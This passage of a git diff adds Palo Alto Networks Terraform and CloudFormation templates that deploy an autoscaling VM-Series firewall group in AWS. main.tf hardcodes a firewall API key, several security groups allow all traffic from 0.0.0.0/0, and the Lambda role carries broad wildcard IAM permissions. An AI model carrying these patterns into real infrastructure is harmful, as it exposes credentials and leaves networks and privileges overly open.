+             "LambdaExecutionRole": {"Ref": "LambdaExecutionRole0"},
+             "S3BucketName": {"Ref": "S3BucketName"},
+             "S3ObjectName": {"Ref": "S3ObjectName"},
+             "QueueURL": {"Ref": "QueueURL"},
+             "RoleARN": {"Ref": "RoleARN"},
+             "ExternalId": {"Ref": "ExternalId"}
+         }
+    },
+    "LambdaCustomResource1": {
+        "Type": "AWS::CloudFormation::CustomResource",
+        "Condition": "CreateCrossAccountRole",
+        "Version" : "1.0",
+        "DependsOn": ["NLBDeployerLambda1"],
+         "Properties" : {
+             "ServiceToken": { "Fn::GetAtt" : ["NLBDeployerLambda1", "Arn"] },
+             "StackName": {"Ref": "AWS::StackName"},
+             "Region": {"Ref": "AWS::Region"},
+             "table_name": {"Ref": "TableName"},
+             "NLB-ARN": {"Ref": "NLBARN"},
+             "NLB-NAME": {"Ref": "NLBName"},
+             "LambdaExecutionRole": {"Ref": "LambdaExecutionRole1"},
+             "S3BucketName": {"Ref": "S3BucketName"},
+             "S3ObjectName": {"Ref": "S3ObjectName"},
+             "QueueURL": {"Ref": "QueueURL"},
+             "RoleARN": {"Ref": "RoleARN"},
+             "ExternalId": {"Ref": "ExternalId"}
+         }
+    }
+  }
+}
diff --git a/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip b/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip
new file mode 100644
index 00000000..83dbc829
Binary files /dev/null and b/aws/tgw_inbound_asg/bootstrap_files/panw-aws.zip differ
diff --git a/aws/tgw_inbound_asg/diagram.png b/aws/tgw_inbound_asg/diagram.png
new file mode 100644
index 00000000..59f6541c
Binary files /dev/null and b/aws/tgw_inbound_asg/diagram.png differ
diff --git a/aws/tgw_inbound_asg/main.tf b/aws/tgw_inbound_asg/main.tf
new file mode 100644
index 00000000..4b426bba
--- /dev/null
+++ b/aws/tgw_inbound_asg/main.tf
@@ -0,0 +1,87 @@
+/*
+                                              SUPPORT POLICY
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. 
+These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as 
+and when possible. We do not provide technical support or help in using or troubleshooting the components of 
+the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized 
+Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) 
+by the scripts or templates are still supported, but the support is only for the product functionality and 
+not for help in deploying or using the template or script itself. Unless explicitly tagged, all projects or 
+work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official 
+Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
+*/
+
+#-----------------------------------------------------------------------------------------------------------------
+# CREATE INBOUND SECURITY VPC
+module "vpc_in" {
+  source       = "./modules/vpc_in/"
+  tag          = "${var.tag}"
+  region       = "${var.region}"
+  tgw_id       = "${var.tgw_id}"
+  tgw_rtb_id   = "${var.tgw_rtb_id}"
+  cidr_vpc     = "10.255.0.0/16"
+  azs          = ["us-east-1a", "us-east-1b"]
+  cidr_mgmt    = ["10.255.0.0/28", "10.255.0.16/28"]
+  cidr_untrust = ["10.255.1.0/28", "10.255.1.16/28"]
+  cidr_trust   = ["10.255.2.0/28", "10.255.2.16/28"]
+  cidr_tgw     = ["10.255.3.0/28", "10.255.3.16/28"]
+  cidr_natgw   = ["10.255.4.0/28", "10.255.4.16/28"]
+  cidr_lambda  = ["10.255.5.0/28", "10.255.5.16/28"]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# CREATE S3 BUCKET FOR VM-SERIES BOOTSTRAP
+module "s3_in" {
+  source = "./modules/s3_bootstrap/"
+
+  file_location      = "bootstrap_files/"
+  bucket_name        = "fw-tgw-inbound-demo"
+  bucket_name_random = true
+  config             = ["bootstrap.xml", "init-cfg.txt"]
+  license            = ["authcodes"]
+  content            = []
+  software           = []
+  other              = ["panw-aws.zip", "pan_nlb_lambda.template", "nlb.zip"]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# DEPLOY VM-SERIES AUTOSCALE GROUP
+module "fw_in" {
+  source = "./modules/fw_in_asg/"
+
+  tag              = "${var.tag}"
+  region           = "${var.region}"
+  vpc_id           = "${module.vpc_in.vpc_id}"
+  vpc_sg_id        = "${module.vpc_in.default_security_group_id}"
+  lambda_bucket    = "${module.s3_in.bucket_name}"
+  lambda_subnet_id = "${module.vpc_in.lambda_id}"
+  natgw_subnet_id  = "${module.vpc_in.natgw_id}"
+
+  fw_key_name             = "${var.key_name}"
+  fw_bucket               = "${module.s3_in.bucket_name}"
+  fw_ami                  = "${var.fw_ami}"
+  fw_vm_type              = "m4.xlarge"
+  fw_sg_source            = "${var.fw_sg_source}"
+  fw_subnet0_id           = "${module.vpc_in.mgmt_id}"
+  fw_subnet1_id           = "${module.vpc_in.untrust_id}"
+  fw_subnet2_id           = "${module.vpc_in.trust_id}"
+  fw_min_instances        = "1"                           // FOR EACH AZ
+  fw_max_instances        = "2"                           // FOR EACH AZ
+  fw_scale_threshold_up   = "80"
+  fw_scale_threshold_down = "20"
+  fw_scale_parameter      = "DataPlaneCPUUtilizationPct"
+  fw_scale_period         = "900"
+
+  api_key_firewall  = "LUFRPT1Zd2pYUGpkMUNrVEZlb3hROEQyUm95dXNGRkU9N0d4RGpTN2VZaVZYMVVoS253U0p6dlk3MkM0SDFySEh2UUR4Y3hzK2g3ST0="
+  api_key_panorama  = ""
+  api_key_delicense = ""
+
+  enable_debug = "No"
+
+  dependencies = [
+    "${module.s3_in.completion}",
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+
diff --git a/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf b/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf
new file mode 100644
index 00000000..35f18c1e
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/fw_in_asg/main.tf
@@ -0,0 +1,810 @@
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+resource "random_string" "randomstring" {
+  length      = 6
+  min_upper   = 4
+  min_numeric = 2
+  special     = false
+}
+
+resource "aws_iam_role" "FirewallBootstrapRole" {
+  name = "${var.tag}-vmseries-${random_string.randomstring.result}"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+      "Service": "ec2.amazonaws.com"
+    },
+      "Action": "sts:AssumeRole"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_instance_profile" "FirewallBootstrapInstanceProfile" {
+  name = "${var.tag}-FirewallInstanceProfile-${random_string.randomstring.result}"
+  role = "${aws_iam_role.FirewallBootstrapRole.name}"
+  path = "/"
+}
+
+resource "aws_iam_role_policy" "FirewallBootstrapRolePolicy" {
+  name = "${var.tag}-FirewallRolePolicy-${random_string.randomstring.result}"
+  role = "${aws_iam_role.FirewallBootstrapRole.id}"
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+
+  policy = <<EOF
+{
+  "Version" : "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Action": "s3:ListBucket",
+      "Resource": "arn:aws:s3:::${var.fw_bucket}"
+    },
+    {
+      "Effect": "Allow",
+      "Action": "s3:GetObject",
+      "Resource": "arn:aws:s3:::${var.fw_bucket}/*"
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role" "LambdaExecutionRole" {
+  name = "${var.tag}-LambdaExecutionRole-${random_string.randomstring.result}"
+  path = "/"
+
+  assume_role_policy = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Action": "sts:AssumeRole",
+      "Principal": {
+        "Service": "lambda.amazonaws.com"
+      },
+      "Effect": "Allow",
+      "Sid": ""
+    }
+  ]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "LambdaExecutionRolePolicy" {
+  name = "${var.tag}-LambdaExecutionRolePolicy-${random_string.randomstring.result}"
+  role = "${aws_iam_role.LambdaExecutionRole.id}"
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+
+  policy = <<EOF
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+          "Effect": "Allow",
+          "Action": "s3:ListBucket",
+          "Resource": "arn:aws:s3:::${var.fw_bucket}"
+        },
+        {
+          "Effect": "Allow",
+          "Action": "s3:GetObject",
+          "Resource": "arn:aws:s3:::${var.fw_bucket}/*"
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "ec2:AllocateAddress",
+                "ec2:AssociateAddress",
+                "ec2:AssociateRouteTable",
+                "ec2:AttachInternetGateway",
+                "ec2:AttachNetworkInterface",
+                "ec2:CreateNetworkInterface",
+                "ec2:CreateTags",
+                "ec2:DeleteNetworkInterface",
+                "ec2:DeleteRouteTable",
+                "ec2:DeleteSecurityGroup",
+                "ec2:DeleteTags",
+                "ec2:DescribeAddresses",
+                "ec2:DescribeAvailabilityZones",
+                "ec2:DescribeInstanceAttribute",
+                "ec2:DescribeInstanceStatus",
+                "ec2:DescribeInstances",
+                "ec2:DescribeImages",
+                "ec2:DescribeNatGateways",
+                "ec2:DescribeNetworkInterfaceAttribute",
+                "ec2:DescribeNetworkInterfaces",
+                "ec2:DescribeTags",
+                "ec2:DescribeVpcEndpoints",
+                "ec2:DescribeVpcs",
+                "ec2:DescribeSubnets",
+                "ec2:DescribeSecurityGroups",
+                "ec2:DetachInternetGateway",
+                "ec2:DetachNetworkInterface",
+                "ec2:DetachVolume",
+                "ec2:DisassociateAddress",
+                "ec2:DisassociateRouteTable",
+                "ec2:ModifyNetworkInterfaceAttribute",
+                "ec2:ModifySubnetAttribute",
+                "ec2:MonitorInstances",
+                "ec2:RebootInstances",
+                "ec2:ReleaseAddress",
+                "ec2:ReportInstanceStatus",
+                "ec2:TerminateInstances",
+                "ec2:DescribeIdFormat"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "events:*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "cloudwatch:*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "lambda:AddPermission",
+                "lambda:CreateEventSourceMapping",
+                "lambda:CreateFunction",
+                "lambda:DeleteEventSourceMapping",
+                "lambda:DeleteFunction",
+                "lambda:GetEventSourceMapping",
+                "lambda:ListEventSourceMappings",
+                "lambda:RemovePermission",
+                "lambda:UpdateEventSourceMapping",
+                "lambda:UpdateFunctionCode",
+                "lambda:UpdateFunctionConfiguration",
+                "lambda:GetFunction",
+                "lambda:ListFunctions"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "autoscaling:*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "sqs:ReceiveMessage",
+                "sqs:SendMessage",
+                "sqs:SetQueueAttributes",
+                "sqs:PurgeQueue",
+                "sqs:DeleteMessage"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "elasticloadbalancing:AddTags",
+                "elasticloadbalancing:AttachLoadBalancerToSubnets",
+                "elasticloadbalancing:ConfigureHealthCheck",
+                "elasticloadbalancing:DescribeInstanceHealth",
+                "elasticloadbalancing:DescribeLoadBalancerAttributes",
+                "elasticloadbalancing:DescribeLoadBalancerPolicyTypes",
+                "elasticloadbalancing:DescribeLoadBalancerPolicies",
+                "elasticloadbalancing:DescribeLoadBalancers",
+                "elasticloadbalancing:DescribeTags",
+                "elasticloadbalancing:DetachLoadBalancerFromSubnets",
+                "elasticloadbalancing:ModifyLoadBalancerAttributes",
+                "elasticloadbalancing:RemoveTags",
+                "elasticloadbalancing:DescribeTargetGroups"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "iam:PassRole",
+                "iam:GetRole"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "logs:CreateLogGroup",
+                "logs:CreateLogStream",
+                "logs:PutLogEvents"
+            ],
+            "Resource": "arn:aws:logs:*:*:*"
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "cloudformation:DescribeStacks"
+            ],
+            "Resource": "*"
+        },
+        {
+            "Effect": "Allow",
+            "Action": [
+                "logs:CreateLogGroup",
+                "logs:CreateLogStream",
+                "logs:PutDestination",
+                "logs:PutDestinationPolicy",
+                "logs:PutLogEvents",
+                "logs:PutMetricFilter"
+            ],
+            "Resource": [
+                "*"
+            ]
+        },
+        {
+            "Effect": "Allow",
+            "Action": "dynamodb:*",
+            "Resource": "arn:aws:dynamodb:*:*:*"
+        }
+    ]
+}
+EOF
+}
+
+resource "aws_lambda_function" "FwInit" {
+  function_name = "${var.tag}-FwInit-${random_string.randomstring.result}"
+  handler       = "fw_init.lambda_handler"
+  role          = "${aws_iam_role.LambdaExecutionRole.arn}"
+  s3_bucket     = "${var.lambda_bucket}"
+  s3_key        = "${var.KeyMap["Key"]}"
+  runtime       = "python2.7"
+  timeout       = "300"
+
+  vpc_config {
+    subnet_ids         = ["${var.lambda_subnet_id}"]
+    security_group_ids = ["${var.vpc_sg_id}"]
+  }
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+}
+
+resource "aws_sqs_queue" "LambdaENIQueue" {
+  name = "${var.tag}-LambdaENIQueue-${random_string.randomstring.result}"
+
+  depends_on = [
+    "aws_lambda_function.InitLambda",
+  ]
+}
+
+resource "aws_sns_topic" "LambdaENISNSTopic" {
+  name = "${var.tag}-LambdaENISNSTopic-${random_string.randomstring.result}"
+
+  depends_on = [
+    "aws_lambda_function.FwInit",
+  ]
+}
+
+resource "aws_sns_topic_subscription" "LambdaENISNSTopicSubscription" {
+  topic_arn = "${aws_sns_topic.LambdaENISNSTopic.arn}"
+  endpoint  = "${aws_lambda_function.FwInit.arn}"
+  protocol  = "lambda"
+
+  depends_on = [
+    "aws_lambda_function.FwInit",
+  ]
+}
+
+resource "aws_lambda_permission" "LambdaENIPermission" {
+  statement_id  = "ProvideLambdawithPermissionstoSNS"
+  action        = "lambda:InvokeFunction"
+  function_name = "${aws_lambda_function.FwInit.arn}"
+  principal     = "sns.amazonaws.com"
+  source_arn    = "${aws_sns_topic.LambdaENISNSTopic.arn}"
+
+  depends_on = [
+    "aws_lambda_function.FwInit",
+    "aws_sns_topic.LambdaENISNSTopic",
+  ]
+}
+
+resource "aws_sqs_queue" "NetworkLoadBalancerQueue" {
+  name = "${var.tag}-NetworkLoadBalancerQueue-${random_string.randomstring.result}"
+}
+
+resource "aws_iam_role" "ASGNotifierRole" {
+  name = "${var.tag}-ASGNotifierRole-${random_string.randomstring.result}"
+  path = "/"
+
+  assume_role_policy = <<EOF
+{
+    "Version" : "2012-10-17",
+    "Statement": [{
+    "Effect": "Allow",
+    "Principal": {
+        "Service": ["autoscaling.amazonaws.com"]
+    },
+    "Action": ["sts:AssumeRole"]
+    }]
+}
+EOF
+}
+
+resource "aws_iam_role_policy" "ASGNotifierRolePolicy" {
+  name = "${var.tag}-ASGNotifierRolePolicy-${random_string.randomstring.result}"
+  role = "${aws_iam_role.ASGNotifierRole.id}"
+
+  depends_on = [
+    "aws_sns_topic.LambdaENISNSTopic",
+  ]
+
+  policy = <<EOF
+{
+    "Version" : "2012-10-17",
+    "Statement": [{
+    "Effect": "Allow",
+    "Action": "sns:Publish",
+    "Resource": "${aws_sns_topic.LambdaENISNSTopic.arn}"
+    }]
+}
+EOF
+}
+
+resource "aws_lambda_function" "InitLambda" {
+  function_name = "${var.tag}-InitLambda-${random_string.randomstring.result}"
+  handler       = "init.lambda_handler"
+  role          = "${aws_iam_role.LambdaExecutionRole.arn}"
+  s3_bucket     = "${var.lambda_bucket}"
+  s3_key        = "${var.KeyMap["Key"]}"
+  runtime       = "python2.7"
+  timeout       = "300"
+
+  depends_on = [
+    "aws_iam_role.LambdaExecutionRole",
+    "null_resource.dependency_getter",
+  ]
+}
+
+resource "aws_security_group" "PublicLoadBalancerSecurityGroup" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Public ELB security group"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-elb-sg"
+  }
+}
+
+resource "aws_lb" "PublicLoadBalancer" {
+  name               = "${var.tag}-vmseries-elb-${random_string.randomstring.result}"
+  internal           = false
+  load_balancer_type = "application"
+  subnets            = ["${var.fw_subnet1_id}"]
+  security_groups    = ["${aws_security_group.PublicLoadBalancerSecurityGroup.id}"]
+
+  tags = {
+    Environment = "${var.tag}-vmseries-elb"
+  }
+}
+
+resource "aws_lb_target_group" "PublicLoadBalancerTargetGroup" {
+  name = "${var.tag}-81-${random_string.randomstring.result}"
+
+  depends_on = [
+    "aws_lb.PublicLoadBalancer",
+  ]
+
+  health_check {
+    enabled             = true
+    interval            = 60
+    unhealthy_threshold = 10
+    protocol            = "HTTP"
+    port                = 81
+    path                = "/index.html"
+    matcher             = "200"
+  }
+
+  port     = 81
+  protocol = "HTTP"
+  vpc_id   = "${var.vpc_id}"
+}
+
+resource "aws_lb_listener" "PublicLoadBanlancerListener" {
+  load_balancer_arn = "${aws_lb.PublicLoadBalancer.arn}"
+  port              = "80"
+  protocol          = "HTTP"
+
+  default_action {
+    type             = "forward"
+    target_group_arn = "${aws_lb_target_group.PublicLoadBalancerTargetGroup.arn}"
+  }
+}
+
+resource "aws_security_group" "mgmt" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Security Group assigned to VM-Series management ENI"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["${var.fw_sg_source}"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-mgmt-sg"
+  }
+}
+
+resource "aws_security_group" "untrust" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Security Group assigned to VM-Series untrust ENI"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-untrust-sg"
+  }
+}
+
+resource "aws_security_group" "trust" {
+  vpc_id      = "${var.vpc_id}"
+  description = "Security Group assigned to VM-Series trust ENI"
+
+  ingress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  egress {
+    from_port   = "0"
+    to_port     = "0"
+    protocol    = "-1"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+
+  tags = {
+    Name = "${var.tag}-trust-sg"
+  }
+}
+
+resource "aws_cloudformation_stack" "LambdaCustomResource" {
+  name       = "${var.tag}-LambdaCustomResource"
+  depends_on = ["aws_lambda_function.FwInit", "aws_lambda_function.InitLambda", "null_resource.dependency_getter"]
+
+  parameters {
+    InitLambdaArn                    = "${aws_lambda_function.InitLambda.arn}"
+    StackName                        = "${var.tag}"
+    Region                           = "${var.region}"
+    VPCID                            = "${var.vpc_id}"
+    MGMTSubnetAz1                    = "${join(",", var.fw_subnet0_id)}"
+    UNTRUSTSubnetAz1                 = "${join(",", var.fw_subnet1_id)}"
+    TRUSTSubnetAz1                   = "${join(",", var.fw_subnet2_id)}"
+    MgmtSecurityGroup                = "${aws_security_group.mgmt.id}"
+    UntrustSecurityGroup             = "${aws_security_group.untrust.id}"
+    TrustSecurityGroup               = "${aws_security_group.trust.id}"
+    VPCSecurityGroup                 = "${var.vpc_sg_id}"
+    KeyName                          = "${var.fw_key_name}"
+    ELBName                          = "${aws_lb.PublicLoadBalancer.id}"
+    ELBTargetGroupName               = "${aws_lb_target_group.PublicLoadBalancerTargetGroup.name}"
+    FWInstanceType                   = "${var.fw_vm_type}"
+    SSHLocation                      = "${var.fw_sg_source}"
+    MinInstancesASG                  = "${var.fw_min_instances}"
+    MaximumInstancesASG              = "${var.fw_max_instances}"
+    ScaleUpThreshold                 = "${var.fw_scale_threshold_up}"
+    ScaleDownThreshold               = "${var.fw_scale_threshold_down}"
+    ScalingParameter                 = "${var.fw_scale_parameter}"
+    ScalingPeriod                    = "${var.fw_scale_period}"
+    PanFwAmiId                       = "${var.fw_ami}"
+    LambdaENISNSTopic                = "${aws_sns_topic.LambdaENISNSTopic.id}"
+    FirewallBootstrapInstanceProfile = "${aws_iam_instance_profile.FirewallBootstrapInstanceProfile.id}"
+    LambdaExecutionRole              = "${aws_iam_role.LambdaExecutionRole.id}"
+    ASGNotifierRole                  = "${aws_iam_role.ASGNotifierRole.arn}"
+    ASGNotifierRolePolicy            = "${aws_iam_role_policy.ASGNotifierRolePolicy.id}"
+    BootstrapS3Bucket                = "${var.fw_bucket}"
+    LambdaS3Bucket                   = "${var.lambda_bucket}"
+    PanS3KeyTpl                      = "${var.KeyMap["Key"]}"
+    KeyPANWFirewall                  = "${var.api_key_firewall}"
+    KeyPANWPanorama                  = "${var.api_key_panorama}"
+    NATGWSubnetAz1                   = "${join(",", var.natgw_subnet_id)}"
+    LambdaSubnetAz1                  = "${join(",", var.lambda_subnet_id)}"
+    FwInit                           = "${aws_lambda_function.FwInit.id}"
+    InitLambda                       = "${aws_lambda_function.InitLambda.id}"
+    KeyDeLicense                     = "${var.api_key_delicense}"
+    LambdaENIQueue                   = "${aws_sqs_queue.LambdaENIQueue.id}"
+    Debug                            = "${var.enable_debug}"
+    NetworkLoadBalancerQueue         = "${aws_sqs_queue.NetworkLoadBalancerQueue.id}"
+  }
+
+  template_body = <<STACK
+{
+    "Parameters" : {
+        "InitLambdaArn": {
+            "Type": "String",
+            "Description": "ARN of the Init Lambda function"
+        },
+        "StackName": {
+            "Type": "String",
+            "Description": "Name of the Stack"
+        },
+        "Region": {
+            "Type": "String",
+            "Description": "The Region that the infrastructure is being deployed into"
+        },
+        "VPCID": {
+            "Type": "String",
+            "Description": "VPC ID"
+        },
+        "MGMTSubnetAz1" : {
+            "Type" : "CommaDelimitedList",
+            "Description": "Enter Subnet ID for the mgmt interface for AZ1"
+        },
+        "UNTRUSTSubnetAz1" : {
+            "Type" : "CommaDelimitedList",
+            "Description": "Enter Subnet ID for the untrust interface for AZ1"
+        },
+        "TRUSTSubnetAz1" : {
+            "Type" : "CommaDelimitedList",
+            "Description": "Enter Subnet ID for the trust interface for AZ1"
+        },      
+        "MgmtSecurityGroup": {
+            "Type": "String",
+            "Description": "Mgmt Security Group"
+        },
+        "UntrustSecurityGroup": {
+            "Type": "String",
+            "Description": "Untrust Security Group"
+        },
+        "TrustSecurityGroup": {
+            "Type": "String",
+            "Description": "Trust Security Group"
+        },
+        "VPCSecurityGroup": {
+            "Type": "String",
+            "Description": "VPC Security Group"
+        },
+        "KeyName": {
+            "Type": "String",
+            "Description": "Name of an existing Key in AWS"
+        },
+        "ELBName": {
+            "Type": "String",
+            "Description": "Name of the ELB"
+        },
+        "ELBTargetGroupName": {
+            "Type": "String",
+            "Description": "ELB Target Group Name"
+        },
+        "FWInstanceType": {
+            "Type": "String",
+            "Description": "FW Instance Type"
+        },
+        "SSHLocation": {
+            "Type": "String",
+            "Description": "The CIDR from where ssh sessions will originate"
+        },
+        "MinInstancesASG": {
+            "Type": "String",
+            "Description": "Minimum # of desired FW instances"
+        },
+        "MaximumInstancesASG": {
+            "Type": "String",
+            "Description": "Max # of instances in the ASG"
+        },
+        "ScaleUpThreshold": {
+            "Type": "String",
+            "Description": "The threshold which triggers a scale up event"
+        },
+        "ScaleDownThreshold": {
+            "Type": "String",
+            "Description": "The threshold which triggers a scale down event"
+        },
+        "ScalingParameter": {
+            "Type": "String",
+            "Description": "Parameter which determines the scaling"
+        },
+        "ScalingPeriod": {
+            "Type": "String",
+            "Description": "The duration of the scaling"
+        },
+        "PanFwAmiId": {
+            "Type": "String",
+            "Description": "AMI id of the PANW FW for the chosen region"
+        },
+        "LambdaENISNSTopic": {
+            "Type": "String",
+            "Description": "SNS topic that receives ASG notifications"
+        },
+        "FirewallBootstrapInstanceProfile": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "LambdaExecutionRole": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "ASGNotifierRole": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "ASGNotifierRolePolicy": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "BootstrapS3Bucket": {
+            "Type": "String",
+            "Description": "S3 bucket for firewall bootstrap"
+        },
+        "LambdaS3Bucket": {
+            "Type": "String",
+            "Description": "S3 bucket for firewall bootstrap"
+        },
+        "PanS3KeyTpl": {
+            "Type": "String",
+            "Description": "Version Associated with PANW Lambda"
+        },
+        "KeyPANWFirewall": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "KeyPANWPanorama": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "NATGWSubnetAz1": {
+            "Description": "Subnet IDs of AWS NAT Gateway in AZ1 ",
+            "Type" : "CommaDelimitedList"
+        },
+        "LambdaSubnetAz1": {
+            "Description": "Subnet IDs of Lambda Function interface in AZ1",
+            "Type" : "CommaDelimitedList"
+        },
+        "FwInit": {
+            "Type": "String",
+            "Description": "ARN of the Init FW function"
+        },
+        "InitLambda": {
+            "Type": "String",
+            "Description": "ARN of the Init Lambda function"
+        },
+        "KeyDeLicense": {
+            "Type": "String",
+            "Description": "The key to be used to delicense the Firewall"
+        },
+        "LambdaENIQueue": {
+            "Type": "String",
+            "Description": "Just a simple message"
+        },
+        "Debug": {
+            "Type": "String",
+            "Default": "No",
+            "AllowedValues": [
+                "Yes",
+                "No"
+            ]
+        },
+        "NetworkLoadBalancerQueue": {
+            "Type": "String",
+            "Description": "NLB Queue"
+        }
+    },
+    "Resources" : {
+    "LambdaCustomResource": {
+        "Type": "AWS::CloudFormation::CustomResource",
+        "Version" : "1.0",
+         "Properties" : {
+            "ServiceToken": {"Ref": "InitLambdaArn"},
+            "StackName": {"Ref": "StackName"},
+            "Region": {"Ref": "Region"},
+            "VpcId": {"Ref": "VPCID"},
+            "SubnetIDMgmt": { "Ref" : "MGMTSubnetAz1" },
+            "SubnetIDUntrust": { "Ref" : "UNTRUSTSubnetAz1" },
+            "SubnetIDTrust": { "Ref" : "TRUSTSubnetAz1" },
+            "MgmtSecurityGroup": {"Ref": "MgmtSecurityGroup"},
+            "UntrustSecurityGroup": {"Ref": "UntrustSecurityGroup"},
+            "TrustSecurityGroup": {"Ref": "TrustSecurityGroup"},
+            "VPCSecurityGroup": {"Ref": "VPCSecurityGroup"},
+	          "KeyName" : {"Ref": "KeyName"},
+	          "ELBName" : {"Ref": "ELBName"},
+	          "ELBTargetGroupName"  : { "Ref": "ELBTargetGroupName"},
+	          "FWInstanceType" : {"Ref": "FWInstanceType"},
+	          "SSHLocation" : {"Ref": "SSHLocation"},
+            "MinInstancesASG": {"Ref": "MinInstancesASG"},	          
+	          "MaximumInstancesASG" : {"Ref": "MaximumInstancesASG"},
+	          "ScaleUpThreshold" : {"Ref": "ScaleUpThreshold"},
+	          "ScaleDownThreshold" : {"Ref": "ScaleDownThreshold"},
+	          "ScalingParameter" : {"Ref": "ScalingParameter"},
+	          "ScalingPeriod" : {"Ref": "ScalingPeriod"},
+	          "ImageID" : { "Ref": "PanFwAmiId" },
+            "LambdaENISNSTopic": {"Ref": "LambdaENISNSTopic"},
+            "FirewallBootstrapRole": {"Ref": "FirewallBootstrapInstanceProfile"},
+            "LambdaExecutionRole": {"Ref": "LambdaExecutionRole"},
+            "ASGNotifierRole": {"Ref": "ASGNotifierRole"},
+            "ASGNotifierRolePolicy": {"Ref": "ASGNotifierRolePolicy"},
+	          "BootstrapS3Bucket" : { "Ref" : "BootstrapS3Bucket" },
+	          "LambdaS3Bucket" : { "Ref" : "LambdaS3Bucket" },
+	          "PanS3KeyTpl" : { "Ref" : "PanS3KeyTpl" },
+	          "KeyPANWFirewall" : { "Ref" : "KeyPANWFirewall" },
+	          "KeyPANWPanorama" : { "Ref" : "KeyPANWPanorama" },
+            "SubnetIDNATGW": { "Ref" : "NATGWSubnetAz1" },
+            "SubnetIDLambda": { "Ref" : "LambdaSubnetAz1" }, 
+            "FwInit": {"Ref": "FwInit"},
+            "InitLambda": {"Ref": "InitLambda"},
+            "KeyDeLicense": { "Ref": "KeyDeLicense" },
+            "LambdaENIQueue" : { "Ref": "LambdaENIQueue" },
+            "Debug": {"Ref": "Debug" },
+            "NetworkLoadBalancerQueue" : { "Ref": "NetworkLoadBalancerQueue" }
+       }
+    }
+  }
+}
+STACK
+}
diff --git a/aws/tgw_inbound_asg/modules/fw_in_asg/outputs.tf b/aws/tgw_inbound_asg/modules/fw_in_asg/outputs.tf
new file mode 100644
index 00000000..4025cb0e
--- /dev/null
+++ b/aws/tgw_inbound_asg/modules/fw_in_asg/outputs.tf
@@ -0,0 +1,7 @@
+output "sqs_id" {
+  value = "${aws_sqs_queue.NetworkLoadBalancerQueue.id}"
+}
+
+output "lb_dns_name" {
+  value = "${aws_lb.PublicLoadBalancer.dns_name}"
+}
\ No newline at end of file
diff --git a/aws/tgw_inbound_asg/modules/fw_in_asg/variables.tf b/aws/tgw_inbound_asg/modules/fw_in_asg/variables.tf
new file mode 100644
